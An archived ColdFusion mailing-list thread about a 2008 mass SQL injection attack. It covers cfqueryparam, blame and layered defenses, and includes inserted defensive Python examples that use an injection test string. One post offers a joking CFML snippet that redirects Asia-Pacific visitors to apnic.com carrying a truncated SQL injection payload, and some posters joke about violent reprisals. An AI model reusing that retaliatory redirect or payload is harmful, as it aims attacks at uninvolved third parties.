Visit http://training.figleaf.com/ for more information!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310849
...
> But one can dream..... Like you said, I also doubt it will become open
> source this release... Or even the next, but it will happen... Mark those
> words...
While I don't think we'll get away from SQL anytime soon, I have
managed to get most of hibernate's functionality to work with CF.
I've gone so far as to use it to reverse engineer the database and
create POJO CFCs (oh, that would be a bad buzzword to start!), in line
with the source generation hibernate can do.
And, this seemed pretty cool: you can "annotate" cfcs, which are used
to build your DB schema, and it will try to update the schema as you
update the model (the cfcs).
You can run queries based on objects and whatnot, sorta, but I'm still
playing with a lot of the implementation, and want to run some load
tests as part of that, etc..
With what I've got so far, you can also drive your model and your DB
with the hibernate HBM mapping files, since I, once again, sorta
followed what hibernate already had, and mostly, I wanted to take
advantage of the nifty eclipse hibernate plugin (nice: auto-completes,
GUI relationship editor, query builder/runner, etc.).
My code is all still like, pre-alpha, but it appears to be sorta a
workable idea.
Hibernate is very robust! Color me impressed.
Railo and BlueDragon are both entering the open source arena, there's
nothing preventing us from doing whatever we want, really. That's a
wonderful feeling!
With MG3 (maybe with some more fleshing out of its scaffolding), and
hibernate, we're about where you want to be, already.
I'm way on board for the idea of having some tight integration with
hibernate in the next release tho-- if it ties in with half the stuff
hibernate can do, I'd be stoked.
I'm not sure about the ethical ramifications of cfc annotation, though.
Should ColdFusion components really drive your model? HBM mappings, even?
Eh, it's cool as fuck anyways. =]
--
"The earth laughs in flowers."
E. E. Cummings
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310823
Dave,
You of all people have been around long enough to know that we as
developers would want our jobs made easier. It makes me wonder why you made your
comment.
Grails is built on top of Java, just as much as ColdFusion is. So what is
your point?
As far as an ORM, I would love to see Spring and Hibernate native to
ColdFusion with support for the dynamic features of Grails.
Could you imagine your new domain model creating, updating etc., based on
your domain model and having that automatically done on your DB... And there
is no more coding for different DBs, because the ORM takes all that
under control for you.
But the closures and dynamic nature of Grails make me think how great it is to
write code like this:
    def saveAs = {
        Account.dowherefullNameIsLike("something")
    }
That is not the exact syntax, but the fact is that the where condition is
dynamically built.
I actually love the concept that ColdFusion could adopt a more dynamic
approach, with the integration of Spring and Hibernate and maybe the ability
to run Groovy; the reality is strong even if Adobe don't wish to do it. The
ability to provide on-the-fly scaffolding is also great. True MVC approach
if you wanted, with SES integration...
The point is that ColdFusion can be just as powerful, with the ability
to add these things.
Now the point is that open source also allows us developers to make these
integrations, and maybe to share them as a plugin. This separates
the core engine from the features of the product, and this is why I think it
is a wise move, because it allows fixes to be made by anyone and
submitted back to Adobe. As for 3rd-party integration like cfreport and
cfdocument, to name a couple, these would then fall into features that Adobe
can still hang on to, and hence become their new business model for CF
going forward into the brave world of open source.
But one can dream..... Like you said, I also doubt it will become open
source this release... Or even the next, but it will happen... Mark those
words...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310814
Interestingly, hibernate is one of the rumoured additions to CF9:
http://www.barneyb.com/barneyblog/2008/06/19/cfunited-day-one/
etc
>
> ColdFusion is a programming language, like Java. Just as Java doesn't come
> with an ORM, neither should CF.
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310800
...
> I just see different degrees of guilt. Negligence from developers,
> greedy shortcuts from management, lazyness from end users, criminal
> intent from hackers etc.
I don't see ISPs on there, and while I'm no fan of much of the
ISP-based stuff, there are certainly steps that could be taken to
improve the situation.
I think there is plenty of money being made on both ends, so it would
take a public outcry or something to effect change.
Not to defend crappy code (which I *never* create! My code's all
perfect, springing like some type of Greek (Roman?) god from my mind),
but really, it seems like heat on ISPs and whatnot isn't exactly a
/bad/ thing, in certain cases.
Or maybe it's all just freedom, and I should love it up while we gotz
it (probably serious, BTW).
Eh. That's all I got, just pointing out we're beholden, somehow, or
something. Hmm, not sure actually.
--
bah.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310772
> Suggesting and getting caught doing are 2 different things. IF
> writing/posting code were an issue though... then everyone who posted the
> full script would be worried ;-)
I hope it's just chicken-little, but it's happening to other countries, so...
If we continue down the path we've sorta started, defending against
this stuff (by spreading information, and/or using tools) will be just
as illegal as actually perpetrating crimes.
Just a little off-topic food for thought. Fight for your right, pump
up the volume, etc..
/end public service announcement
--
email? Hmmm... get me my aid! -- Or better yet, just have the aid do
it for me.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310739
Security in layers.
While it is usually best to thwart this style of attack at the
router/firewall, it is wise to have the extra layers at the
Apache/IIS/web server, ColdFusion application, CF query and JDBC DB user
permission layers. If the first layer is bypassed or compromised then the
next layer catches the attack, and so on. Having security in layers makes it
that much harder for someone to launch a successful attack.
Wil Genovese
Sr. Web Application Developer
On Mon, Aug 11, 2008 at 11:22 AM, Dana Kowalski
<DanaKowalski@gmail.com>wrote:
> Seeing code solutions to this is cool. but imho it's best left to your
> router/firewall to handle. I'd contact the provider to have them put some
> better controls in place. These are scenarios that almost delve into why
> Cisco has the zero day features on their gear..
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310737
> The second is that this is why..... ColdFusion should have
> adopted an approach that used an ORM instead.... With an ORM
> it reduces the risk, provided the ORM takes these attacks seriously.
>
> I have never seen these attacks with hibernate, within GORM
> and Domain Driven design approaches.
ColdFusion is a programming language, like Java. Just as Java doesn't come
with an ORM, neither should CF.
> I so hope that ColdFusion 9, has 2 things on its release.
>
> 1) The engine itself is open sourced. And the extra
> functionality and support for middle tier API integration is adopted.
I strongly doubt that CF will be open source.
> 2) GORM style approach as in DDD (Domain Driven Design) is
> taken more seriously.
>
> With these 2 additions then SQL injection will be a thing of the past.
With prepared statements, SQL injection has long been a thing of the past.
It's not the job of an ORM to separate SQL code from data values.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
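As an added illustration of the point made above (example code written for this page, not code from the thread, from ColdFusion, or from any of the tools it mentions), the following Python uses the standard sqlite3 module to stand in for cfquery/cfqueryparam; the mechanism is the same, a fixed SQL text with the value bound separately. The table, its rows and the injection payload are constructed. It also shows the integer-coercion fallback that val() gave you before cfqueryparam existed, and the one case a bound parameter cannot cover: an identifier such as an ORDER BY column, which has to be checked against a whitelist instead.

```python
import sqlite3

# Constructed payload: closes the string literal, adds an always-true
# condition and comments out the rest of the query.
INJECTION = "' OR 1=1 --"

ALLOWED_SORT_COLUMNS = {"id", "title"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the site's datasource."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO news VALUES (1, 'Zebra story', 1);
        INSERT INTO news VALUES (2, 'Alpha draft', 0);
    """)
    return conn


def search_concatenated(conn: sqlite3.Connection, fragment: str) -> list:
    """The pattern the thread is telling people to stop using: the request
    value is spliced into the SQL text, so it can change the query's logic."""
    sql = ("SELECT title FROM news WHERE published = 1 "
           "AND title LIKE '%" + fragment + "%'")
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, fragment: str) -> list:
    """The cfqueryparam equivalent: the SQL is fixed text and the value is
    sent as a bound parameter, so it is only ever treated as data."""
    sql = "SELECT title FROM news WHERE published = 1 AND title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + fragment + "%",))]


def get_by_id(conn: sqlite3.Connection, raw_id: str):
    """The pre-cfqueryparam fallback for numeric input: coerce to an integer
    before the value gets anywhere near the SQL. (CF's val() returns 0 for
    non-numeric input; this version rejects it outright.)"""
    try:
        news_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM news WHERE id = " + str(news_id)).fetchone()
    return row[0] if row else None


def list_titles(conn: sqlite3.Connection, sort_column: str) -> list:
    """Identifiers such as an ORDER BY column cannot be bound as parameters,
    so the only safe option is a fixed whitelist of accepted names."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unexpected sort column: %r" % sort_column)
    sql = "SELECT title FROM news ORDER BY " + sort_column
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("concatenated, injected :", search_concatenated(db, INJECTION))
    print("parameterized, injected:", search_parameterized(db, INJECTION))
    print("parameterized, normal  :", search_parameterized(db, "story"))
    print("coerced id             :", get_by_id(db, "1"), get_by_id(db, "1 OR 1=1"))
    print("whitelisted sort       :", list_titles(db, "title"))
```

Run stand-alone, the concatenated search returns both rows, including the unpublished one, while the parameterized search with the same payload returns nothing because the whole string is matched as a LIKE pattern.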
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310735
----- Excess quoted text cut - see Original Post for more -----
This is a poor example, because there are issues of negligence that exist in
a professional setting (employee/employer or consultant/client) that don't
exist in a personal setting (hanging out on a street corner). Unwise actions
aren't necessarily negligent in the eyes of the law.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310733
----- Excess quoted text cut - see Original Post for more -----
My school of thought is that, if you fail to conform to minimal standards of
adequate protection, you have failed to meet due diligence requirements.
Your client or employer can sue you for negligence, and they may well win.
Although, to be honest, that's not really a school of thought, it's an
observation of reality.
My school of thought is that there are some things within my control, and
other things beyond my control. I am responsible for the things within my
control. I don't have control over Eastern European crime syndicates. I do
have control over my own application code.
CFQUERYPARAM was introduced in CF4. You have had years to solve this
problem. Your applications may have been attacked long before now, without
you even knowing it.
You are free to be angry at the people who've done this. But you're going to
have to fix the problem yourself. If we lived in a world where justice were
guaranteed, I'd be right there with you in going after these folks, with the
requisite tar, feathers and pitchforks. If these people are ever brought to
court, I'll be right there with you in calling for their heads. But we don't
live in that world, and the only thing we can do is affect the things we
control.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Dana Kowalski
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310732
Seeing code solutions to this is cool. but imho it's best left to your
router/firewall to handle. I'd contact the provider to have them put some better
controls in place. These are scenarios that almost delve into why Cisco has the
zero day features on their gear..
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310729
Dave Morris wrote:
> Ah. You're from the "blame the victim" school.
I just see different degrees of guilt. Negligence from developers,
greedy shortcuts from management, laziness from end users, criminal
intent from hackers etc.
> So I shouldn't be mad at the poor little hackers, because they were doing us
> all favor by pointing out our faults. That is your school of thought,
> right?
The fact is that we all know that whatever we connect to the internet
will be attacked. We all know it is an arms race that has been going on
for more than a decade and there is no end in sight. What is important
is what we do with that knowledge. Do we make sure we are protected to
the best of our ability, both for our own sake and to make sure our
systems do not become an attack vector against somebody else, or not?
Every IP address of an attack source that has been published on this
list is from somebody who chose not to do so.
Jochem
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310726
I started not to use the rape analogy and certainly didn't want to
trivialize something so terrible, but thought it appropriate,
especially since someone had brought it up as an analogy previously.
Please don't take offense, anyone.
Know that I have a daughter and I tell her all the time not to put
herself by action or location in a situation to be vulnerable to such an attack.
And while I would gently remind her at some point if she were out
somewhere she shouldn't have been, I would probably just have to
kill her rapist...seriously.
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310724
> I'm fairly convinced this bot used the Internet Explorer on the victims
It would make sense to use the same ActiveX control IE uses, yes.
--
Tom Chiverton
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310721
Actually it was Dave Morris who originally used rape to compare the 2.
Rick was just responding..
----- Excess quoted text cut - see Original Post for more -----
Author: Robert Rawlins
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310720
Rick,
That might be a slightly off angle analogy. If a girl asks to be raped, then
she is clearly consenting to the act and therefore it's not technically rape
any more, that's the real world equivalent of building a server and
publishing open source software for download, then complaining that someone
'stole' it.
A better analogy is back to leaving the house door unlocked, it still
doesn't change the fact that a criminal act has been committed, the burglar
still takes your possessions without consent, and the burglar would still be
found guilty for it, however, I suspect your house insurance wouldn't pay
out for the loss.
You're right though, this is a shared responsibility issue here, the hacker
is legally responsible for his acts, however, you have a responsibility to
your client or employer not to leave the door unlocked.
Rob
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310719
Rick,
While your argument is well put, perhaps we could choose a slightly less
inflammatory analogy than rape. We have a large group here and I wouldn't
want anyone to be incensed by trivializing such a traumatic event (although
obviously that is not the intent).
-Mark
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310718
Actually, if you read my blog analysis of the zombies:
http://www.codersrevolution.com/index.cfm/2008/8/10/My-analysis-of-the-SQL-injection-zombies
7% of the IPs returned a cookie I set.
75% of IPs that sent more than 2 hits returned my cookie.
(Hits came in groups of two)
I'm fairly convinced this bot used the Internet Explorer on the victims
machine to send out the requests. I can't prove it, but it probably would
have been easier for them to code that way.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Larry Lyons
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310717
Criticizing someone for negligence is not blaming the victim. If the person who
coded the site is so incompetent as not to include a cfqueryparam for any user
input that has direct impact on the database, then they deserve to get blamed.
What's so difficult about <cfqueryparam cfsqltype="CF_SQL_INTEGER"
value="#form.foo#" />
As for going back and finding out where the unprotected queries are, it's not that
difficult: if you're using CFEclipse, Dan Switzer of pengoworks has written a
nice bit of regex to use with the file search. It goes through your project or
entire workspace and finds all the queries that need paramed.
<cfquery\s[^>]*>([^#]*(((?<!value=")#[^#]*#)))((?<!</cfquery)[^>]*?)</cfquery>
There are also a few tools out there (mentioned previously on HOF) that will do
the same and produce detailed report. Try them as well. To make it easy, here are
links to two of the tools:
qpScanner by Peter Boughton (RiaForge)
http://www.codersrevolution.com/enclosures/qpscanner7.zip
Query Parameterizer by Daryl Banttari
http://www.codersrevolution.com/enclosures/_parameterizeQueries.zip
Brad Wood has written a good overview of both of these tools:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
You've got no excuse now.
----- Excess quoted text cut - see Original Post for more -----
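To show in runnable form what the regex above is hunting for, here is a small scanner added for this page. It is not Dan Switzer's regex, not qpScanner or the Query Parameterizer, and not code from anyone in the thread; it is written in Python so it can be pointed at a tree of .cfm/.cfc files from the command line. The CFML it scans by default is a constructed sample. The approach is simpler than a single lookbehind regex: take each <cfquery> body, blank out every <cfqueryparam> tag (whose value="#x#" is bound, not interpolated) and every "##" escape (CFML's literal "#"), then report whatever "#...#" is left. Two caveats a practitioner should keep in mind: it flags ORDER BY column names and similar identifiers too, which cannot be parameterized and need a whitelist instead, and it cannot see inside a stored procedure that concatenates its own SQL.

```python
import re
import sys

# Constructed sample CFML for demonstration; it is not code from the thread.
# It mixes parameterized and unparameterized queries, plus a '##' escape
# (CFML's way of writing a literal '#') that must not be reported.
SAMPLE_CFML = """\
<cfquery name="safe" datasource="app">
    SELECT id, title FROM news
    WHERE id = <cfqueryparam cfsqltype="CF_SQL_INTEGER" value="#url.id#" />
</cfquery>

<cfquery name="unsafe" datasource="app">
    SELECT id, title FROM news
    WHERE category = '#url.cat#'
</cfquery>

<cfquery name="mixed" datasource="app">
    SELECT id FROM news
    WHERE id = <cfqueryparam cfsqltype="CF_SQL_INTEGER" value="#form.id#">
    ORDER BY #form.sortcol#
</cfquery>

<cfquery name="literal" datasource="app">
    SELECT '##' AS hash_char FROM dual
</cfquery>
"""

# Opening-tag attributes in group 1, query body in group 2.
QUERY_RE = re.compile(r"<cfquery\b([^>]*)>(.*?)</cfquery>", re.IGNORECASE | re.DOTALL)
NAME_RE = re.compile(r'\bname\s*=\s*"([^"]*)"', re.IGNORECASE)
PARAM_RE = re.compile(r"<cfqueryparam\b[^>]*>", re.IGNORECASE | re.DOTALL)
# A '#expr#' interpolation; it never spans a line, so a stray '#' cannot pair up.
INTERP_RE = re.compile(r"#[^#\n]+#")


def _blank(text: str) -> str:
    """Replace every non-newline character with a space so the masked text
    keeps the same length and line structure as the original."""
    return re.sub(r"[^\n]", " ", text)


def find_unparameterized(cfml: str):
    """Return (query_name, line_number, expression) for every #...#
    interpolation in a <cfquery> body that is not inside a <cfqueryparam>."""
    findings = []
    for query in QUERY_RE.finditer(cfml):
        name_match = NAME_RE.search(query.group(1))
        name = name_match.group(1) if name_match else "<unnamed>"
        body_start = query.start(2)
        # Mask the pieces that may legitimately contain '#': cfqueryparam tags
        # and the '##' escape. Masking preserves offsets, so line numbers hold.
        masked = PARAM_RE.sub(lambda m: _blank(m.group(0)), query.group(2))
        masked = masked.replace("##", "  ")
        for hit in INTERP_RE.finditer(masked):
            line = cfml.count("\n", 0, body_start + hit.start()) + 1
            findings.append((name, line, hit.group(0)))
    return findings


def scan_files(paths):
    """Scan each file on disk and return {path: findings}."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            results[path] = find_unparameterized(fh.read())
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:
        report = scan_files(sys.argv[1:])
    else:
        report = {"<sample>": find_unparameterized(SAMPLE_CFML)}
    for path, findings in report.items():
        for name, line, expr in findings:
            print("%s:%d: query '%s' interpolates %s without cfqueryparam"
                  % (path, line, name, expr))
```

Saved as, say, qpscan.py, `python qpscan.py path/to/*.cfm` prints one line per unparameterized interpolation with the file, line and query name; run with no arguments it reports the two problem spots in the built-in sample (the "unsafe" query's category literal and the "mixed" query's ORDER BY column) and stays quiet about the "##" literal.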
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310716
This would probably be more productively viewed as a
"responsibility" issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility
for the status of the server/data/etc.
A negligent server/website admin bears a certain amount
of responsibility for the situation. The attacker also
bears responsibility for the consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator
would view it as shared responsibility between the attacker
and the attacked, as in, "Why wasn't the server/website protected
in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and, therefore,
punishment, but a fair judge would have to ask the girl why
was she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist their
impulses.
Likewise, server/website admins should reasonably protect their servers and
websites, but hackers should avoid their impulses or share responsibility for the
situation.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310715
I see it as different than pointing fingers.. You ALLOWED it to happen
by not fully protecting your code, you're not necessarily to blame.
Anyways, good luck defending the attacks.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310714
And that girl who was raped should not have been wearing a skirt.
Yes, we've implemented things way more sophisticated than CFQUERYPARAM.
Anybody who waits until the SQL query to try to detect bogus data is asking
for trouble.
But crime is crime, and we should not be allowing criminals to CHOP away at
our systems until they find that one hole we didn't catch, and then blame it
on the victim!
Dave Morris
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310712
> I'm sure they exist even for CF 4.0
Yup, the val() function did/does wonders for integer input on queries,
even way back in CF4.
-Justin Scott
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310711
Ummm but is it not your website that YOU left vulnerable? If you
didn't have access to cfqueryparam then you should have used an
alternate approach. I'm sure they exist even for CF 4.0, a little
extra time at the beginning validating variables would save so much
grief now right? And from what I'm hearing from popular sites is it's
not so much the cfqueryparam because they are still getting hit
thousands of times every minute, like HoF. So there's other steps, not
just within CF. I think MD was working on something to stop the
intruders at the server, before it even hits CF.
I'm not saying it's entirely YOUR fault but you allowed it to happen,
same thing Dave Watts is saying..
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310705
Ah. You're from the "blame the victim" school.
Unfortunately, when I wrote the first 1,000 ColdFusion templates using Ben
Forta's CF 4.0 book, there was no CFQueryParam. So going back and rewriting
all those programs (now well into several thousand) has been a bitch. And
all it took was one missed spot.
So I shouldn't be mad at the poor little hackers, because they were doing us
all favor by pointing out our faults. That is your school of thought,
right?
Dave Morris
----- Excess quoted text cut - see Original Post for more -----
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310668
Hmmm...
Of course it is possible to use cookies.... They chose not to... Why...
Because they have no real need to be attached to a session....
Think about it for a minute or two...
> very few bots accept cookies. I've never actually seen one that does,
> but I have read it is possible to write one that will.
>
> Wil Genovese
> One man with courage makes a majority.
> -Andrew Jackson
> A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310667
Well.......
This has got to be the strongest case for unit testing then...
If a component is unit tested, then the first thing is that you will know
that this could happen and fix it straight away.
The second is that this is why..... ColdFusion should have adopted an
approach that used an ORM instead.... With an ORM it reduces the risk,
provided the ORM takes these attacks seriously.
I have never seen these attacks with hibernate, within GORM and Domain
Driven design approaches.
I so hope that ColdFusion 9, has 2 things on its release.
1) The engine itself is open sourced. And the extra functionality and
support for middle tier API integration is adopted.
2) GORM style approach as in DDD (Domain Driven Design) is taken more
seriously.
With these 2 additions then SQL injection will be a thing of the past.
> > Yep, was curious about that too. I modified Justin's script to not send
> > e-mails, but to write a simple log entry - more an act of curiosity than
> > anything else - I just log the date, time, and client IP address.
> > --- Ben
>
> Tell us how you really feel Ben. :)
> I had to temporarily stop apache on my site long enough to get a stop gap in
> place. My database is safe, but I was getting around 90 requests a second
> and ColdFusion and MySQL were eating up all the server's CPU trying to keep
> up. SSH was even unresponsive.
> I think I'm going to dump all these attempts in a database to analyze. I'm
> curious where the majority of the IPs are coming from. There has to be a
> way to squeak in the ear of ISPs loud enough to have them shut down infected
> users until they are cleaned.
> ~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310658
> Anyway, I propose the dot-com millionaires who left us stuck
> with the current mess in the spam and virus arena be
> personally required to fund an international Goon Squad with
> kneecap breaking instructions to go after these vandals.
And who exactly would that be?
> If someone did this crap to your house, you'd have the police
> and/or FBI out there in a heartbeat tracking down the
> criminals. This is criminal mischief on a global scale.
If you left your front door open, so that anyone could just walk in, you'd
have no one but yourself to blame. If you're looking for an analogy, that's
the one that fits. The reason this particular attack has been so successful
is the arguably criminal negligence of so many web developers, coupled with
the typical improper usage of administrator rights on untrained users'
desktops.
People have been harping on these two issues for years - I know I have. As a
web developer, one of these issues is within your direct control. If you've
failed to do anything about unparameterized queries until something bad
happens to you, you've failed to meet the minimal due diligence for being a
web application developer.
> And if Interpol won't do anything about it, and if the powers
> that be refuse to attach any form of responsibility or
> traceability to the ownership of an IP address, then we may
> just have to implement vigilante measures and go after the
> crooks ourselves.
Well, uh, good luck with that. Let me know how it goes with you against the
Russian mafia. This stuff is no longer just maladjusted kids in their
parents' basement - there's money to be had here, and there are people going
after that money. I suggest your efforts are better directed at ensuring the
adequacy of your own sites' protection instead.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310657
Wait, sorry. This is a cf-community thread, not a cf-talk one. It will be
moved right away.
On Sun, Aug 10, 2008 at 11:32 PM, Michael Dinowitz <
mdinowit@houseoffusion.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310656
I propose a baseball bat. It works well with both genders.
> You assume much.
>
> Women are just as prowess at running a computer virus attack as men.
>
> We just don't hear about them as much, as they seem to not get caught as
> often.
>
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310655
You haven't been around teenage boys much recently. That and the XBox are the
ONLY things they would miss.
Anyway, I propose the dot-com millionaires who left us stuck with the current
mess in the spam and virus arena be personally required to fund an international
Goon Squad with kneecap breaking instructions to go after these vandals.
If someone did this crap to your house, you'd have the police and/or FBI out
there in a heartbeat tracking down the criminals. This is criminal mischief on a
global scale. And if Interpol won't do anything about it, and if the powers that
be refuse to attach any form of responsibility or traceability to the ownership
of an IP address, then we may just have to implement vigilante measures and go
after the crooks ourselves.
Dave Morris
(Owner of a huge web site who just spent 2 days fending off the barbarians at the
gates)
>::-----Original Message-----
>::Mind you given they most likely live in their parent's basement, they
>::probably would not miss it.
>::
>::
Author: William Seiter
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310653
You assume much.
Women have just as much prowess at running a computer virus attack as men.
We just don't hear about them as much, as they seem to not get caught as
often.
:)
::-----Original Message-----
::
::Sent: Sunday, August 10, 2008 5:57 PM
::To: CF-Talk
::Subject: Re: SQL injection attack on House of Fusion
::
::>I've heard that in Saudi Arabia, a thief has the offending member removed
::at
::>the wrist. Since hackers commit their offence with their brain, wouldn't
::it
::>be appropriate to behead them?
::>
::>Just a suggestion. :-\
::>
::>Dave L.
::
::Personally I'd rather they had a different part of their anatomy cut off.
::
::Mind you given they most likely live in their parent's basement, they
::probably would not miss it.
::
::
Author: Larry Lyons
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310650
>I've heard that in Saudi Arabia, a thief has the offending member removed at
>the wrist. Since hackers commit their offence with their brain, wouldn't it
>be appropriate to behead them?
>
>Just a suggestion. :-\
>
>Dave L.
Personally I'd rather they had a different part of their anatomy cut off.
Mind you given they most likely live in their parent's basement, they probably
would not miss it.
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310641
Suggesting and getting caught doing are 2 different things. IF
writing/posting code were an issue though... then everyone who posted the
full script would be worried ;-)
If anything in my hypothetical 'if' were an issue though... I'd drag you
down with me for helping to spread it in your reply :-o
Heh
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310639
I'd tell you to watch what you suggest on a public forum, but heck-- we
already know the FBI doesn't care. :)
~Brad
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310632
Because the majority of the IPs I've seen from this one belong to them... as
they do more often than not in these situations.
Start keeping firewall logs in general and checking them. I guarantee you
will find APNIC in them.
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310631
I guess i'm missing something, Bobby. Why does a big share of the
problem belong to Apnic?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310629
I wrote something a long time ago to automate grabbing specified info from
http://ws.arin.net/whois/ on an IP... I was bored
You can pass the IP in the URL like so:
http://ws.arin.net/whois/?queryinput=203.160.1.52
So... parse the content of a cfhttp call to
http://ws.arin.net/whois/?queryinput=#ipAddress# to grab what you want from
the cfhttp.filecontent
Hmmm... if everyone did something like this... it would not only be funny...
but probably piss off apnic and make them do something about their portion
of this problem (which is most of it)
<cfhttp url="http://ws.arin.net/whois/?queryinput=#cgi.remote_addr#"
resolveurl="no" />
<cfif findnocase('Asia Pacific', cfhttp.filecontent)>
<cflocation url="http://apnic.com/?;DECLARE @S CHAR(4000);SET
@S=CAST( etc... etc..." addtoken="no" />
</cfif>
Or if you are nicer than me...
<cfif findnocase('Asia Pacific', cfhttp.filecontent) AND
findnocase(';DECLARE', cgi.query_string)>
Yes... bored again.
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310623
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that lets me do a handful at a time, but I don't know how
accurate the data is. It is saying the majority of my IPs originated from
the US.
~Brad
> Now look at how many of those are from Asia Pacific Network Info Centre
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310621
